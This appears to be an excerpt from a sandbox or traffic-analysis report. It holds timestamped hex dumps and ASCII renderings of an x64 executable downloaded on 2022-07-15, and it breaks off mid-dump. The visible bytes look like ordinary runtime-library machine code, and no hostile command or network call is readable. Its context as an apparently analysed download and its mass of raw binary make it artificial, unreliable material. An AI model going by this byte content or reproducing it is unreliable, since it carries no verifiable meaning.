                                                                  Data Ascii: Ht)-Y\-9XY-e\T$HH$H#H$YY$\$xf(f(XL$pYY\^YXXf( Y\\\(t$PHhHhfWHIL$p$)
                                                                  2022-07-15 01:58:15 UTC111INData Raw: 0f 28 ce 4c 8b c3 b9 15 00 00 00 e8 45 a5 00 00 eb 4b 48 8b d7 48 8b cb e8 8c a8 00 00 66 0f 57 35 6c 7f 08 00 eb 0b 48 8b d7 48 8b cb e8 77 a8 00 00 66 0f 28 c6 eb 25 8b 44 24 54 48 8b d7 48 8b cb 0f ba f0 1f 89 44 24 5c 8b 44 24 50 89 44 24 58 e8 52 a8 00 00 f2 0f 10 44 24 58 48 8b 5c 24 60 0f 28 74 24 30 48 83 c4 40 5f c3 cc cc cc cc 48 83 ec 48 f2 0f 11 4c 24 38 f2 0f 11 44 24 30 dd 44 24 38 dd 44 24 30 d9 e5 9b dd 7c 24 10 0f b7 4c 24 10 81 e1 00 45 00 00 d9 f8 9b df e0 66 a9 00 04 75 f5 dd 1c 24 66 0f 12 04 24 d9 e5 9b dd 7c 24 08 0f b7 54 24 08 81 e2 00 45 00 00 dd d8 81 fa 00 01 00 00 74 38 81 f9 00 01 00 00 74 30 83 e0 1d 75 1a 81 fa 00 05 00 00 74 12 48 83 c4 48 c3 66 66 66 66 66 0f 1f 84 00 00 00 00 00 b8 08 00 00 00 49 b8 00 00 00 00 00 00 f8
                                                                  Data Ascii: (LEKHHfW5lHHwf(%D$THHD$\D$PD$XRD$XH\$`(t$0H@_HHL$8D$0D$8D$0|$L$Efu$f$|$T$Et8t0utHHfffffI
                                                                  2022-07-15 01:58:15 UTC115INData Raw: c7 c0 01 00 00 00 e8 31 bf 00 00 e9 45 04 00 00 49 3b d2 74 3a 4d 3b c1 75 35 48 b8 00 00 00 00 00 00 f0 7f 4c 23 c8 4c 3b c8 75 23 48 b8 ff ff ff ff ff ff 0f 00 49 23 c0 74 14 4d 8b c8 49 c7 c0 01 00 00 00 e8 f2 be 00 00 e9 06 04 00 00 49 c7 c0 01 00 00 00 4c 8b ca e8 de be 00 00 e9 f2 03 00 00 48 b8 00 00 00 00 00 00 f8 ff 4c 3b c0 75 35 48 b8 00 00 00 00 00 00 f0 7f 4c 23 d0 4c 3b d0 75 23 48 b8 ff ff ff ff ff ff 0f 00 48 23 c2 74 14 4c 8b ca 49 c7 c0 01 00 00 00 e8 9a be 00 00 e9 a5 03 00 00 4d 8b c8 49 c7 c0 01 00 00 00 e8 86 be 00 00 e9 91 03 00 00 e9 8c 03 00 00 4d 3b c1 75 76 4d 85 d2 75 09 66 0f 57 c0 e9 79 03 00 00 48 b8 00 00 00 00 00 00 f0 3f 4c 3b d0 7d 20 48 b8 00 00 00 00 00 00 f0 7f 4c 3b c8 74 d9 49 c7 c0 08 00 00 00 e8 3f be 00 00 e9 4a
                                                                  Data Ascii: 1EI;t:M;u5HL#L;u#HI#tMIILHL;u5HL#L;u#HH#tLIMIM;uvMufWyH?L;} HL;tI?J
                                                                  2022-07-15 01:58:15 UTC119INData Raw: 84 24 70 02 00 00 89 5c 24 30 48 89 44 24 28 4c 8d 4c 24 70 41 b8 00 02 00 00 33 c9 89 5c 24 20 e8 ee 60 00 00 4c 8d 9c 24 70 03 00 00 48 8d 4e 1d 33 d2 41 f6 03 01 74 0c 80 09 10 8a 84 14 70 01 00 00 eb 10 41 f6 03 02 74 12 80 09 20 8a 84 14 70 02 00 00 88 81 00 01 00 00 eb 07 c6 81 00 01 00 00 00 48 ff c1 48 ff c2 49 83 c3 02 48 83 eb 01 75 bf eb 3f 33 d2 48 8d 4e 1d 44 8d 42 9f 41 8d 40 20 83 f8 19 77 08 80 09 10 8d 42 20 eb 0c 41 83 f8 19 77 0e 80 09 20 8d 42 e0 88 81 00 01 00 00 eb 07 c6 81 00 01 00 00 00 ff c2 48 ff c1 3b d3 72 c7 48 8b 8c 24 70 05 00 00 48 33 cc e8 d2 ad 00 00 4c 8d 9c 24 80 05 00 00 49 8b 5b 18 49 8b 73 20 49 8b e3 5f c3 cc 48 89 5c 24 10 57 48 83 ec 20 e8 6d f7 ff ff 48 8b f8 8b 88 c8 00 00 00 85 0d 26 fa 08 00 74 13 48 83 b8 c0
                                                                  Data Ascii: $p\$0HD$(LL$pA3\$ `L$pHN3AtpAt pHHIHu?3HNDBA@ wB Aw BH;rH$pH3L$I[Is I_H\$WH mH&tH
                                                                  2022-07-15 01:58:15 UTC124INData Raw: 83 f8 ff 74 2c 48 63 db 48 03 db 49 8b 4c de 08 e8 cd 8c ff ff 49 8b 54 de 08 48 83 64 24 20 00 4c 8d 4c 24 48 4c 8b c0 48 8b cf ff 15 f9 83 07 00 48 8b 5c 24 40 48 8b 7c 24 50 4c 8b 6c 24 58 48 83 c4 30 41 5e c3 cc cc cc 48 83 ec 28 b9 03 00 00 00 e8 0e b3 00 00 83 f8 01 74 17 b9 03 00 00 00 e8 ff b2 00 00 85 c0 75 1d 83 3d d0 e4 08 00 01 75 14 b9 fc 00 00 00 e8 a4 fd ff ff b9 ff 00 00 00 e8 9a fd ff ff 48 83 c4 28 c3 cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 54 48 83 ec 20 4c 8d 25 98 ee 08 00 33 f6 33 ff 49 8b dc 83 7b 08 01 75 25 48 63 c6 ba a0 0f 00 00 ff c6 48 8d 0c 80 48 8d 05 e6 58 09 00 48 8d 0c c8 48 89 0b e8 46 08 00 00 85 c0 74 2d 48 8d 05 9f f0 08 00 48 83 c3 10 ff c7 48 3b d8 7c c3 b8 01 00 00 00 48 8b 5c 24 30 48 8b 74 24 38 48 8b
                                                                  Data Ascii: t,HcHILITHd$ LL$HLHH\$@H|$PLl$XH0A^H(tu=uH(H\$Ht$H|$ATH L%33I{u%HcHHXHHFt-HHH;|H\$0Ht$8H
                                                                  2022-07-15 01:58:15 UTC128INData Raw: fd a7 00 00 3b c7 75 08 48 8b cb e8 9d a7 00 00 f7 43 18 08 01 00 00 0f 84 8d 00 00 00 8b 2b 48 8b 53 10 2b 6b 10 48 8d 42 01 48 89 03 8b 43 24 ff c8 3b ef 89 43 08 7e 19 44 8b c5 8b ce e8 96 2b 00 00 8b f8 eb 57 83 c9 20 89 4b 18 e9 3f ff ff ff 83 fe ff 74 23 83 fe fe 74 1e 48 8b ce 48 8b c6 48 8d 15 b4 88 0a 00 83 e1 1f 48 c1 f8 05 48 6b c9 58 48 03 0c c2 eb 07 48 8d 0d ec e0 08 00 f6 41 08 20 74 17 33 d2 8b ce 44 8d 42 02 e8 e1 a5 00 00 48 83 f8 ff 0f 84 ef fe ff ff 48 8b 4b 10 8a 44 24 30 88 01 eb 16 bd 01 00 00 00 48 8d 54 24 30 8b ce 44 8b c5 e8 1b 2b 00 00 8b f8 3b fd 0f 85 c5 fe ff ff 0f b6 44 24 30 48 8b 5c 24 38 48 8b 6c 24 40 48 8b 74 24 48 48 83 c4 20 5f c3 cc cc cc 40 53 48 83 ec 20 f6 42 18 40 49 8b d8 74 0c 48 83 7a 10 00 75 05 41 ff 00 eb
                                                                  Data Ascii: ;uHC+HS+kHBHC$;C~D+W K?t#tHHHHHkXHHA t3DBHHKD$0HT$0D+;D$0H\$8Hl$@Ht$HH _@SH B@ItHzuA
                                                                  2022-07-15 01:58:15 UTC131INData Raw: eb 4a 0f ba ed 07 eb 44 83 cd 02 eb 3f 41 83 cd ff 44 89 54 24 70 44 89 54 24 60 44 89 54 24 50 44 89 54 24 4c 41 8b ea 44 89 6c 24 48 44 89 54 24 44 eb 18 48 8b bc 24 a0 00 00 00 8b 54 24 64 41 b9 00 02 00 00 41 bb 30 00 00 00 b9 58 00 00 00 66 44 8b 27 66 45 3b e2 0f 85 29 f6 ff ff 44 38 94 24 90 00 00 00 74 0f 48 8b 8c 24 88 00 00 00 83 a1 c8 00 00 00 fd 8b c6 48 8b 8c 24 b0 04 00 00 48 33 cc e8 a6 80 00 00 48 8b 9c 24 10 05 00 00 48 81 c4 c0 04 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc 89 4c 24 08 48 83 ec 28 45 33 c0 ba 00 10 00 00 33 c9 ff 15 58 6a 07 00 48 89 05 91 3e 09 00 48 85 c0 74 23 4c 8d 44 24 30 41 b9 04 00 00 00 33 d2 48 8b c8 c7 44 24 30 02 00 00 00 ff 15 26 6a 07 00 b8 01 00 00 00 48 83 c4 28 c3 48 89 6c 24 10 48 89 74 24 18 57
                                                                  Data Ascii: JD?ADT$pDT$`DT$PDT$LADl$HDT$DH$T$dAA0XfD'fE;)D8$tH$H$H3H$HA_A^A]A\_^]L$H(E33XjH>Ht#LD$0A3HD$0&jH(Hl$Ht$W
                                                                  2022-07-15 01:58:15 UTC135INData Raw: ff 15 a5 5a 07 00 90 ba 58 00 00 00 44 8d 62 c8 49 8b cc e8 df bc ff ff 4c 8b d8 45 33 ff 49 3b c7 75 08 83 c8 ff e9 7b 02 00 00 48 89 05 09 6c 0a 00 41 8b cc 89 0d fc 6b 0a 00 48 05 00 0b 00 00 4c 3b d8 73 43 45 88 7b 08 49 83 0b ff 41 c6 43 09 0a 45 89 7b 0c 45 88 7b 38 41 c6 43 39 0a 41 c6 43 3a 0a 45 89 7b 50 45 88 7b 4c 49 83 c3 58 48 8b 05 c3 6b 0a 00 48 05 00 0b 00 00 4c 3b d8 72 c3 8b 0d ae 6b 0a 00 66 44 39 7c 24 62 0f 84 49 01 00 00 48 8b 44 24 68 49 3b c7 0f 84 3b 01 00 00 4c 8d 68 04 48 63 30 49 03 f5 bb 00 08 00 00 39 18 0f 4c 18 bf 01 00 00 00 3b cb 0f 8d 8d 00 00 00 4c 8d 35 70 6b 0a 00 ba 58 00 00 00 49 8b cc e8 1f bc ff ff 4c 8b d8 49 3b c7 74 69 49 89 04 fe 8b 05 4d 6b 0a 00 41 03 c4 89 05 44 6b 0a 00 49 8d 8b 00 0b 00 00 4c 3b d9 73 41
                                                                  Data Ascii: ZXDbILE3I;u{HlAkHL;sCE{IACE{E{8AC9AC:E{PE{LIXHkHL;rkfD9|$bIHD$hI;;LhHc0I9L;L5pkXILI;tiIMkADkIL;sA
                                                                  2022-07-15 01:58:15 UTC139INData Raw: 18 57 48 83 ec 20 49 8b f9 49 8b f0 8b da 40 8a e9 4c 8b c7 48 8b d6 40 8a cd ff cb e8 85 ff ff ff 83 3f ff 74 04 85 db 7f e7 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 48 83 ec 20 41 f6 40 18 40 49 8b f9 49 8b f0 8b da 48 8b e9 74 0c 49 83 78 10 00 75 05 41 01 11 eb 37 85 d2 7e 33 8a 4d 00 4c 8b c7 48 8b d6 ff cb e8 1e ff ff ff 48 ff c5 83 3f ff 75 17 e8 45 bd ff ff 83 38 2a 75 11 4c 8b c7 48 8b d6 b1 3f e8 ff fe ff ff 85 db 7f cd 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc 48 89 5c 24 18 55 56 57 41 54 41 55 41 56 41 57 48 81 ec d0 02 00 00 48 8b 05 b6 bc 08 00 48 33 c4 48 89 84 24 c8 02 00 00 33 c0 48 8b d9 48 89 4c 24 68 48 8b fa 48 8d 4c 24 78 49 8b
                                                                  Data Ascii: WH II@LH@?tH\$0Hl$8Ht$@H _H\$Hl$Ht$WH A@@IIHtIxuA7~3MLHH?uE8*uLH?H\$0Hl$8Ht$@H _H\$UVWATAUAVAWHHH3H$3HHL$hHHL$xI
                                                                  2022-07-15 01:58:15 UTC143INData Raw: 07 00 8b f0 48 8d 4b f0 44 39 31 75 05 e8 27 41 ff ff 48 8d 4f f0 44 39 31 75 05 e8 19 41 ff ff 8b c6 e9 cd 01 00 00 48 8b f7 4c 8b e7 44 3b f7 75 0b 48 8b 03 44 8b 70 14 44 89 75 08 8b bd 88 00 00 00 85 ff 75 06 48 8b 03 8b 78 04 41 8b ce e8 dc 8c 00 00 44 8b e8 83 f8 ff 75 07 33 c0 e9 90 01 00 00 4c 8b 7d 78 4c 8b 45 10 3b c7 0f 84 3c 01 00 00 33 db 4c 8d 4d 70 8b d0 8b cf 89 5c 24 28 48 89 5c 24 20 e8 f9 8c 00 00 48 8b f0 48 3b c3 74 c9 44 8b 4d 70 8b 55 00 4c 8b c0 41 8b ce 89 5c 24 28 48 89 5c 24 20 ff 15 19 39 07 00 4c 63 c8 44 89 4d 04 44 3b cb 75 07 8b fb e9 10 01 00 00 44 3b cb 41 be dd dd 00 00 7e 62 49 8b c9 49 83 f9 e0 77 59 48 83 c1 10 48 81 f9 00 04 00 00 77 34 48 8d 59 0f 48 3b d9 77 0a 48 bb f0 ff ff ff ff ff ff 0f 48 83 e3 f0 48 8b c3 e8
                                                                  Data Ascii: HKD91u'AHOD91uAHLD;uHDpDuuHxADu3L}xLE;<3LMp\$(H\$ HH;tDMpULA\$(H\$ 9LcDMD;uD;A~bIIwYHHw4HYH;wHHH
                                                                  2022-07-15 01:58:15 UTC147INData Raw: 15 27 25 07 00 3b c7 75 0a ff 15 cd 27 07 00 3b c7 75 7b 39 7c 24 30 74 75 4c 8d 05 cc b1 fd ff 4b 8b 84 f0 c0 88 0c 00 f6 44 30 08 48 74 22 80 bc 24 b0 00 00 00 0a 74 27 40 88 2b 4b 8b 8c f0 c0 88 0c 00 8a 84 24 b0 00 00 00 88 44 31 09 eb 47 49 3b dd 75 0f 80 bc 24 b0 00 00 00 0a 75 05 c6 03 0a eb 33 8b 8c 24 a0 00 00 00 41 b8 01 00 00 00 48 83 ca ff e8 f1 56 00 00 80 bc 24 b0 00 00 00 0a 4c 8d 05 62 b1 fd ff 74 0f eb 07 4c 8d 05 57 b1 fd ff 40 88 2b 48 ff c3 4c 3b 64 24 40 0f 82 ec fe ff ff eb 1f 4b 8b 84 f0 c0 88 0c 00 f6 44 30 08 40 75 07 80 4c 30 08 02 eb 09 41 8a 04 24 88 03 48 ff c3 8b eb 41 2b ed 41 80 ff 01 0f 85 f0 02 00 00 3b ef 0f 84 e8 02 00 00 41 bf 01 00 00 00 49 2b df f6 03 80 75 08 49 03 df e9 b2 00 00 00 41 8b d7 eb 10 83 fa 04 7f 18 49
                                                                  Data Ascii: '%;u';u{9|$0tuLKD0Ht"$t'@+K$D1GI;u$u3$AHV$LbtLW@+HL;d$@KD0@uL0A$HA+A;AI+uIAI
                                                                  2022-07-15 01:58:15 UTC151INData Raw: 0c 41 8b 03 83 e0 03 74 30 41 2b c4 74 1f 41 2b c4 74 0e 41 3b c4 75 28 48 81 0b 00 60 00 00 eb 1f 48 0f ba 33 0d 48 0f ba 2b 0e eb 13 48 0f ba 33 0e 48 0f ba 2b 0d eb 07 48 81 23 ff 9f ff ff 83 7c 24 60 00 74 08 41 8b 43 50 89 06 eb 07 49 8b 43 50 48 89 06 48 8b 5c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5c c3 cc cc cc 48 83 ec 48 83 64 24 30 00 48 8b 44 24 78 48 89 44 24 28 48 8b 44 24 70 48 89 44 24 20 e8 a2 fc ff ff 48 83 c4 48 c3 cc 48 89 5c 24 10 55 56 57 41 54 41 55 41 56 41 57 48 83 ec 30 33 ed 8b d9 0f 29 74 24 20 83 e3 1f 4d 8b e8 48 8b f2 44 8b f1 44 8d 7d 10 f6 c1 08 74 15 45 84 c0 79 10 8d 4d 01 e8 45 07 00 00 83 e3 f7 e9 e8 01 00 00 b9 04 00 00 00 44 84 f1 74 14 49 0f ba e0 09 73 0d e8 27 07 00 00 83 e3 fb e9 ca 01 00 00 bf 01 00
                                                                  Data Ascii: At0A+tA+tA;u(H`H3H+H3H+H#|$`tACPICPHH\$8Ht$@H|$HH A\HHd$0HD$xHD$(HD$pHD$ HHH\$UVWATAUAVAWH03)t$ MHDD}tEyMEDtIs'
                                                                  2022-07-15 01:58:15 UTC156INData Raw: 9c 24 88 00 00 00 75 07 33 c0 e9 f0 01 00 00 8b 77 14 41 bd 01 00 00 00 3b 35 34 79 08 00 75 0c 3b 35 3c 79 08 00 0f 84 a1 01 00 00 39 1d dc dc 08 00 0f 84 12 01 00 00 0f b7 0d c7 dc 08 00 0f b7 05 c2 dc 08 00 0f b7 15 b7 dc 08 00 44 0f b7 0d a7 dc 08 00 89 44 24 50 89 4c 24 48 89 54 24 40 41 8b cd 66 39 1d 8f dc 08 00 75 30 44 0f b7 15 8d dc 08 00 44 0f b7 1d 81 dc 08 00 44 0f b7 05 7b dc 08 00 44 89 54 24 38 89 5c 24 30 44 89 5c 24 28 44 89 44 24 20 41 8b d5 eb 24 44 0f b7 05 5d dc 08 00 44 0f b7 15 53 dc 08 00 33 d2 44 89 44 24 38 44 89 54 24 30 89 5c 24 28 89 5c 24 20 44 8b c6 e8 3d fc ff ff 0f b7 0d e2 db 08 00 44 0f b7 05 d6 db 08 00 0f b7 05 d5 db 08 00 0f b7 15 ca db 08 00 44 0f b7 0d ba db 08 00 89 44 24 50 89 4c 24 48 89 54 24 40 33 c9 44 89 44
                                                                  Data Ascii: $u3wA;54yu;5<y9DD$PL$HT$@Af9u0DDD{DT$8\$0D\$(DD$ A$D]DS3DD$8DT$0\$(\$ D=DDD$PL$HT$@3DD
                                                                  2022-07-15 01:58:15 UTC160INData Raw: 84 dd 00 00 00 41 83 ea 07 0f 84 af 00 00 00 45 2b d6 74 7c 45 2b d6 74 4e 45 3b d6 0f 85 9f fb ff ff e8 b6 f1 ff ff e8 c1 f5 ff ff 33 db 39 5e 20 48 8b cb 0f 95 c1 48 8b 14 c8 48 8b 4c 24 70 eb 1b 44 8a 02 44 3a c3 0f 84 0d 01 00 00 48 8b 07 49 03 d6 44 88 00 4c 01 37 48 ff 09 48 39 19 75 e0 e9 f4 00 00 00 41 8b 48 14 33 db 3b cb 0f 8c 2d fb ff ff b8 1f 85 eb 51 f7 e9 c1 fa 05 8b c2 c1 e8 1f 03 d0 6b d2 64 2b ca e9 1c fe ff ff 48 8b 44 24 78 33 db 48 89 44 24 28 48 8b 44 24 70 48 89 44 24 20 39 9c 24 80 00 00 00 74 08 41 8b d6 e9 75 fe ff ff 33 d2 e9 6e fe ff ff 33 db 41 39 58 18 0f 8c d8 fa ff ff 8d 4b 06 41 39 48 18 0f 8f cb fa ff ff 8b 4e 18 41 8b d6 e9 cf fd ff ff 33 db 41 39 58 08 0f 8c b4 fa ff ff 41 83 78 08 17 0f 8f a9 fa ff ff 41 83 78 08 0b 48
                                                                  Data Ascii: AE+t|E+tNE;39^ HHHL$pDD:HIDL7HH9uAH3;-Qkd+HD$x3HD$(HD$pHD$ 9$tAu3n3A9XKA9HNA3A9XAxAxH
                                                                  2022-07-15 01:58:15 UTC163INData Raw: 2c 01 00 00 48 81 c4 80 00 00 00 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 cc cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 41 54 48 83 ec 30 45 33 e4 49 8b c1 49 8b f8 48 8b da 48 8b f1 48 85 d2 74 51 4d 85 c0 74 51 48 85 d2 74 03 44 88 22 48 85 c9 74 03 4c 21 21 4c 8b 44 24 60 4c 3b c7 4c 0f 47 c7 49 81 f8 ff ff ff 7f 77 2c 4c 8b 4c 24 68 48 8b d0 48 8b cb e8 21 fc ff ff 48 83 f8 ff 75 3a 48 85 db 74 03 44 88 23 e8 56 5e ff ff 8b 00 eb 6b 4d 85 c0 74 af e8 48 5e ff ff bb 16 00 00 00 4c 21 64 24 20 45 33 c9 45 33 c0 33 d2 33 c9 89 18 e8 5d 5d ff ff 8b c3 eb 42 48 ff c0 48 85 db 74 2f 48 3b c7 76 25 48 83 7c 24 60 ff 74 14 44 88 23 48 3b f8 77 0c e8 07 5e ff ff bb 22 00 00 00 eb bd 48 8b c7 41 bc 50 00 00 00 c6 44 18 ff 00 48 85 f6 74 03 48 89 06 41 8b c4 48 8b
                                                                  Data Ascii: ,HA^A]A\_^][H\$Ht$H|$ATH0E3IIHHHtQMtQHtD"HtL!!LD$`L;LGIw,LL$hHH!Hu:HtD#V^kMtH^L!d$ E3E333]]BHHt/H;v%H|$`tD#H;w^"HAPDHtHAH
                                                                  2022-07-15 01:58:15 UTC167INData Raw: 00 00 e8 3c e2 fe ff 48 8b 8b f8 00 00 00 e8 30 e2 fe ff 48 8b 8b 00 01 00 00 e8 24 e2 fe ff 48 8b 8b 08 01 00 00 e8 18 e2 fe ff 48 8b 8b 10 01 00 00 e8 0c e2 fe ff 48 8b 8b 18 01 00 00 e8 00 e2 fe ff 48 8b 8b 20 01 00 00 e8 f4 e1 fe ff 48 8b 8b 28 01 00 00 e8 e8 e1 fe ff 48 8b 8b 30 01 00 00 e8 dc e1 fe ff 48 8b 8b 38 01 00 00 e8 d0 e1 fe ff 48 8b 8b 40 01 00 00 e8 c4 e1 fe ff 48 8b 8b 48 01 00 00 e8 b8 e1 fe ff 48 8b 8b 50 01 00 00 e8 ac e1 fe ff 48 83 c4 20 5b c3 cc cc 48 85 c9 74 42 53 48 83 ec 20 48 8b d9 48 8b 09 48 3b 0d 95 4d 08 00 74 05 e8 86 e1 fe ff 48 8b 4b 08 48 3b 0d 8b 4d 08 00 74 05 e8 74 e1 fe ff 48 8b 4b 10 48 3b 0d 81 4d 08 00 74 05 e8 62 e1 fe ff 48 83 c4 20 5b c3 48 85 c9 0f 84 8b 00 00 00 53 48 83 ec 20 48 8b d9 48 8b 49 18 48 3b 0d
                                                                  Data Ascii: <H0H$HHHH H(H0H8H@HHHPH [HtBSH HHH;MtHKH;MttHKH;MtbH [HSH HHIH;
                                                                  2022-07-15 01:58:15 UTC171INData Raw: 8b cb 41 8b c5 d3 e0 42 21 44 b4 20 41 8d 42 01 48 63 d0 48 83 fa 03 7d 19 48 8d 4c 94 20 41 b8 03 00 00 00 4c 2b c2 33 d2 49 c1 e0 02 e8 e4 c7 fe ff 44 3b e3 74 02 03 fe 8b 15 0b 3e 08 00 8b c2 2b 05 07 3e 08 00 3b f8 7d 16 48 89 5c 24 20 89 5c 24 28 44 8b c3 bb 02 00 00 00 e9 cc 03 00 00 3b fa 0f 8f 5d 02 00 00 2b 94 24 90 00 00 00 48 8d 44 24 30 45 8b dd 48 8b 08 41 bc 20 00 00 00 44 8b cb 48 89 4c 24 20 8b 48 08 8b c2 99 89 4c 24 28 4c 8b c3 41 23 d7 03 c2 44 8b d0 41 23 c7 2b c2 41 c1 fa 05 8b c8 8b f8 41 d3 e3 44 2b e0 41 f7 d3 42 8b 54 84 20 8b cf 8b c2 d3 ea 41 8b cc 41 0b d1 41 23 c3 89 84 24 90 00 00 00 42 89 54 84 20 4c 03 c6 44 8b 8c 24 90 00 00 00 41 d3 e1 49 83 f8 03 7c cc 4d 63 c2 48 8d 54 24 28 bf 02 00 00 00 49 8b c0 48 8b cf 48 c1 e0 02
                                                                  Data Ascii: AB!D ABHcH}HL AL+3ID;t>+>;}H\$ \$(D;]+$HD$0EHA DHL$ HL$(LA#DA#+AAD+ABT AAA#$BT LD$AI|McHT$(IHH
                                                                  2022-07-15 01:58:15 UTC175INData Raw: 4c 8d 43 fe 48 83 fb ff 48 8d 57 02 44 8b cd 49 8b cd 4c 0f 44 c3 4c 89 74 24 28 44 89 74 24 20 e8 d0 fd ff ff 41 3b c6 74 1f 44 88 37 44 38 74 24 48 0f 84 d3 02 00 00 48 8b 4c 24 40 83 a1 c8 00 00 00 fd e9 c2 02 00 00 80 7f 02 2d 75 06 c6 07 2d 48 ff c7 8b 9c 24 90 00 00 00 c6 07 30 ba 65 00 00 00 8b c3 f7 d8 1a c9 80 e1 e0 80 c1 78 88 4f 01 48 8d 4f 02 e8 a5 22 00 00 49 3b c6 74 10 f7 db 1a c9 80 e1 e0 80 c1 70 88 08 44 88 70 03 44 38 74 24 48 e9 60 02 00 00 48 b8 00 00 00 00 00 00 00 80 49 85 45 00 74 06 c6 07 2d 48 ff c7 44 8b 8c 24 90 00 00 00 41 bb 30 00 00 00 48 bb ff ff ff ff ff ff 0f 00 41 8b c1 44 88 1f f7 d8 41 8b c1 1a c9 80 e1 e0 80 c1 78 f7 d8 48 b8 00 00 00 00 00 00 f0 7f 1b d2 88 4f 01 83 e2 e0 83 ea d9 49 85 45 00 75 1e 44 88 5f 02 49 8b
                                                                  Data Ascii: LCHHWDILDLt$(Dt$ A;tD7D8t$HHL$@-u-H$0exOHO"I;tpDpD8t$H`HIEt-HD$A0HADAxHOIEuD_I
                                                                  2022-07-15 01:58:15 UTC179INData Raw: 1a ff ff 0f ba e6 0f 72 15 f7 c6 00 40 07 00 75 0a 81 7c 24 54 00 80 00 00 74 03 45 0a f4 8b ce 41 b8 03 00 00 00 b8 00 00 00 c0 41 23 c8 ba 00 00 00 80 3b cf 74 54 2b cd 74 3a 3b cd 74 31 e8 ac 1c ff ff 89 38 83 0b ff e8 82 1c ff ff bb 16 00 00 00 45 33 c9 45 33 c0 33 d2 33 c9 48 89 7c 24 20 89 18 e8 97 1b ff ff 8b c3 e9 fc 06 00 00 44 8b f8 eb 19 40 f6 c6 08 74 08 f7 c6 00 00 07 00 75 ed 41 bf 00 00 00 40 eb 03 44 8b fa 8b 8c 24 e0 00 00 00 41 bc 02 00 00 00 83 e9 10 74 2c 83 e9 10 74 23 83 e9 10 74 19 83 e9 10 74 0f 83 f9 40 75 8b 44 3b fa 8b cf 0f 94 c1 eb 10 41 8b c8 eb 0b 41 8b cc eb 06 8b cd eb 02 8b cf 8b c6 ba 00 07 00 00 89 4c 24 44 23 c2 74 46 3d 00 01 00 00 74 38 3d 00 02 00 00 74 2a 3d 00 03 00 00 74 1e 3d 00 04 00 00 74 2a 3d 00 05 00 00 74
                                                                  Data Ascii: r@u|$TtEAA#;tT+t:;t18E3E333H|$ D@tuA@D$At,t#tt@uD;AAL$D#tF=t8=t*=t=t*=t
                                                                  2022-07-15 01:58:15 UTC183INData Raw: 4c 8b c7 48 8b d6 48 8b cd e8 1d ff ff ff 80 7c 24 48 00 74 5a 48 8b 4c 24 40 83 a1 c8 00 00 00 fd eb 4c 0f b6 4d 00 48 8d 54 24 30 e8 42 b3 fe ff 0f b6 0e 48 8d 54 24 30 8b d8 48 ff c5 e8 30 b3 fe ff 48 ff c6 48 83 ef 01 74 08 85 db 74 04 3b d8 74 cf 2b d8 80 7c 24 48 00 74 0c 48 8b 4c 24 40 83 a1 c8 00 00 00 fd 8b c3 eb 02 33 c0 48 8b 5c 24 60 48 8b 6c 24 68 48 8b 74 24 70 48 83 c4 50 5f c3 cc cc cc 48 89 5c 24 08 48 89 6c 24 18 56 57 41 54 48 83 ec 20 44 8b e1 48 8b ca 48 8b da e8 d0 ab fe ff 8b 53 18 48 63 f0 f6 c2 82 75 19 e8 94 0b ff ff c7 00 09 00 00 00 83 4b 18 20 b8 ff ff 00 00 e9 38 01 00 00 f6 c2 40 74 0d e8 76 0b ff ff c7 00 22 00 00 00 eb e0 33 ff f6 c2 01 74 19 89 7b 08 f6 c2 10 0f 84 8a 00 00 00 48 8b 43 10 83 e2 fe 48 89 03 89 53 18 8b 43
                                                                  Data Ascii: LHH|$HtZHL$@LMHT$0BHT$0H0HHtt;t+|$HtHL$@3H\$`Hl$hHt$pHP_H\$Hl$VWATH DHHSHcuK 8@tv"3t{HCHSC
                                                                  2022-07-15 01:58:15 UTC188INData Raw: 74 44 44 2b c8 0f 84 d0 00 00 00 41 83 f9 02 0f 85 a7 00 00 00 39 9c 24 20 01 00 00 0f 84 b1 00 00 00 4d 8d 58 ff 80 fa 2b 74 0e 80 fa 2d 0f 85 97 00 00 00 83 4c 24 34 ff b9 07 00 00 00 4c 8b c8 e9 6c fd ff ff 4c 8b c8 45 8b f1 eb 06 41 8a 10 4d 03 c1 80 fa 30 74 f5 80 ea 31 80 fa 08 0f 87 3d ff ff ff b9 09 00 00 00 e9 72 fe ff ff 8d 42 cf 3c 08 77 0a b9 09 00 00 00 e9 5b fe ff ff 80 fa 30 0f 85 a2 00 00 00 b9 08 00 00 00 e9 6d fe ff ff 8d 42 cf 4d 8d 58 fe 3c 08 76 d8 80 fa 2b 74 14 80 fa 2d 75 d8 83 4c 24 34 ff b9 07 00 00 00 e9 49 fe ff ff b9 07 00 00 00 83 f9 0a 74 6d e9 3a fe ff ff 4d 8b c3 eb 69 4d 8b c3 4c 8b c8 eb 61 4c 8b c8 e9 c7 fe ff ff 4c 8b c8 41 b3 30 45 8b f1 eb 1e 80 fa 39 7f 36 8d 4c ad 00 0f be c2 8d 6c 48 d0 81 fd 50 14 00 00 7f 0d 41
                                                                  Data Ascii: tDD+A9$ MX+t-L$4LlLEAM0t1=rB<w[0mBMX<v+t-uL$4Itm:MiMLaLLA0E96LlHPA
                                                                  2022-07-15 01:58:15 UTC192INData Raw: e8 1f 45 33 e4 44 8d 04 36 44 0b c0 8b ce 43 8d 04 09 c1 e9 1f 41 2b eb 89 54 24 70 0b c1 44 89 44 24 74 89 44 24 78 c1 e8 18 44 88 64 24 7b 04 30 41 88 02 4d 03 d3 41 3b ec 7e 0a 44 8b 4c 24 78 e9 18 ff ff ff 4d 2b d3 41 8a 02 4d 2b d3 3c 35 7c 6e eb 0d 41 80 3a 39 75 0c 41 c6 02 30 4d 2b d3 4c 3b d7 73 ee 4c 3b d7 73 07 4d 03 d3 66 44 01 1b 45 00 1a 44 2a d3 41 80 ea 03 49 0f be c2 44 88 53 03 44 88 64 18 04 41 8b c3 48 8b 8c 24 a0 00 00 00 48 33 cc e8 f0 8c ff ff 48 8b 9c 24 f8 00 00 00 48 81 c4 b0 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 41 80 3a 30 75 08 4d 2b d3 4c 3b d7 73 f2 4c 3b d7 73 ab 66 44 